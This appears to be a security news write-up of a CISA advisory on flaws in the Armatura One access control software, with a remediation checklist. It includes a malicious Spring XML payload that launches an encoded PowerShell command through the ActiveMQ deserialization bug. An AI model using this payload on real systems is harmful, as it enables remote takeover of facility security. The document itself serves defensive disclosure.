The Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency industrial advisory (ICSA-26-274-01) warning of a critical vulnerability chain in Armatura One, a premier physical access control system (PACS) and security management software deployed across critical manufacturing, energy substations, data centers, and transportation facilities. The software embeds a vulnerable message broker susceptible to unauthenticated remote code execution (CVE-2023-46604, CVSS 9.8) and relies on hardcoded cryptographic keys and universal database superuser credentials (CVE-2026-94591, CVE-2026-94592), enabling complete operational takeover of physical security infrastructure.
Physical Access Control in the Crosshairs of Critical Infrastructure
Armatura One serves as the central orchestration brain for physical perimeter security across enterprise and industrial sites. It commands IP-connected door access controllers, optical biometric turnstiles, vehicle barrier gates, elevator floor access dispatchers, and integrated CCTV surveillance cameras.
When an adversary achieves administrative control over an Armatura One server, the consequences transcend digital espionage: attackers can remotely unlock facility perimeter gates, bypass badge badge authentication, suppress physical intrusion alarms, and harvest biometric records (fingerprint templates and facial recognition vectors) of facility personnel.
Anatomy of the Vulnerability Cascade
CISA's advisory documents five severe vulnerabilities affecting all versions of Armatura One prior to v4.7.2 (and USA builds prior to v4.6.1):
1. Remote Code Execution via OpenWire Deserialization (CVE-2023-46604)
To coordinate real-time event telemetry between server services and field door controllers, Armatura One bundles an embedded instance of Apache ActiveMQ, binding the OpenWire protocol listener to 0.0.0.0:61616 by default.
Because the bundled ActiveMQ version is unpatched, it suffers from the infamous ClassPathXmlApplicationContext deserialization vulnerability. An unauthenticated network adversary can send a crafted OpenWire packet instructing the service to load a remote XML configuration file, instantiating arbitrary Java classes and executing OS commands with NT AUTHORITYSYSTEM or root privileges:
<!-- Malicious Spring XML payload fetched by ActiveMQ OpenWire listener -->
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd.exe</value>
<value>/c</value>
<value>powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt...</value>
</list>
</constructor-arg>
</bean>
</beans>
2. Static Cryptographic Keys & Initialization Vectors (CVE-2026-94591)
To protect backend database and broker connection strings, Armatura One provides an option to encrypt sensitive configuration files using AES-128-CBC. However, reverse-engineering of the installation binaries revealed that the 128-bit AES encryption key and Initialization Vector (IV) are hardcoded strings embedded directly in the vendor's compiled DLLs. Any attacker with access to a public evaluation installer can extract the key and decrypt encrypted configuration files offline.
3. Universal Hardcoded Database Superuser Credentials (CVE-2026-94592)
During automated database provisioning, the Armatura One setup routine creates the database superuser account using a static, vendor-defined password rather than generating a randomized cryptographic secret per deployment. An attacker with network access to the database port (PostgreSQL or SQL Server) can authenticate immediately with full administrative rights.
4. Plaintext Credential Logging in Backup Bundles (CVE-2026-94593 / CVE-2026-94594)
When operators generate system backups or diagnostic support bundles, Armatura One records the complete command invocation—including the plaintext database superuser password and broker credentials—into unencrypted text logs (backup_restore.log), allowing unprivileged local users to harvest credentials.
| Vulnerability Identifier | CWE Weakness | CVSS Score | Attack Vector | Exploitation Impact |
|---|---|---|---|---|
| CVE-2023-46604 | CWE-502 Deserialization | 9.8 Critical | Network (Port 61616) | Unauthenticated Remote Code Execution as SYSTEM |
| CVE-2026-94591 | CWE-321 Hard-coded Cryptographic Key | 8.4 High | Local / File Access | Decryption of database connection secrets |
| CVE-2026-94592 | CWE-798 Hard-coded Credentials | 8.4 High | Network / Local DB | Database superuser authentication |
| CVE-2026-94593 | CWE-532 Sensitive Info in Logs | 7.8 High | Local File System | Plaintext credential leakage in backup logs |
Defensive Remediation Checklist for Facility Asset Owners
- Deploy Armatura One v4.7.2 / v4.6.1_USA: Immediately upgrade all primary and redundant access control management servers. The update replaces vulnerable ActiveMQ binaries, revokes static keys, and enforces unique database password generation.
- Firewall ActiveMQ OpenWire Port: Ensure TCP port
61616is strictly blocked at host firewalls and network switches, permitting access only from localhost loopback. - Rotate Database Passwords: Manually change the administrative superuser password for the Armatura database instance and restart access control services.
- Enforce Purdue Model Physical Security Segmentation: Place PACS servers in a dedicated Physical Security VLAN (Purdue Level 3 Ops DMZ). Prohibit direct routing between corporate end-user workstations and access control management interfaces.



